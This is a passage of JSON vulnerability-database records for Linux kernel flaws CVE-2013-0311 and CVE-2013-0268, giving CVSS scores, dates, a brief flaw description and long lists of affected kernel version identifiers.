"cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-0311", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0311", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:36", "description": "The msr_open function in arch/x86/kernel/msr.c in the Linux kernel before 3.7.6 allows local users to bypass intended capability restrictions by executing a crafted application as root, as demonstrated by msr32.c.", "edition": 5, "cvss3": {}, "published": "2013-02-18T04:41:00", "title": "CVE-2013-0268", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0268"], "modified": "2013-08-22T06:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-0268", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0268", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", 